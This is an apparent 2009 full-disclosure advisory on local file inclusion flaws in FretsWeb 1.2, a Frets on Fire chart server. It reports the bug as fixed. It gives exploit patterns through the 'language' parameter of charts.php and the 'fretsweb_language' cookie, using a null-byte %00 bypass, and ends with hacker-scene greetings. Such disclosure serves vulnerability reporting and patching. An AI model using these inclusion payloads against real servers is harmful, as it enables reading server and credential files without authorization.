MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --FretsWeb 1.2-->

Fri, 19 Jun 2009 13:40:10 -0700 

----------------------------------------------------------------

MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --FretsWeb 1.2-->

----------------------------------------------------------------



CMS INFORMATION:



-->WEB: http://sourceforge.net/projects/fretsweb/

-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/

-->DEMO: N/A

-->CATEGORY: CMS / Games/Entertainment

-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...

                is an improved version of FoFCS.It is meant for...

-->RELEASED: 2009-05-30



CMS VULNERABILITY:



-->TESTED ON: firefox 3

-->DORK: N/A

-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)

-->AFFECT VERSION: CURRENT (MAYBE <= ?)

-->Discovered Bug date: 2009-06-02

-->Reported Bug date: 2009-06-02

-->Fixed bug date: 2009-06-14   

-->Info patch: http://sourceforge.net/projects/fretsweb/

-->Author: YEnH4ckEr

-->mail: y3nh4ck3r[at]gmail[dot]com

-->WEB/BLOG: N/A

-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.

-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)









Note: Of course use null byte (%00) when you want to include a file with 
different extension to "php"







###########################

///////////////////////////



LOCAL FILE INCLUSION (LFI):



///////////////////////////

###########################







<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>







[++] GET var --> 'language'







~~~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00







###############################

///////////////////////////////



INSECURE COOKIE HANDLING (LFI):



///////////////////////////////

###############################







[++] Cookie --> 'fretsweb_language'







~~~~~> fretsweb_language=[LFI]%00









#######################################################################

#######################################################################

##*******************************************************************##

##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##

##*******************************************************************##

##-------------------------------------------------------------------##

##*******************************************************************##

##              GREETZ TO: SPANISH H4ck3Rs community!                ##

##*******************************************************************##

#######################################################################

#######################################################################

Reply via email to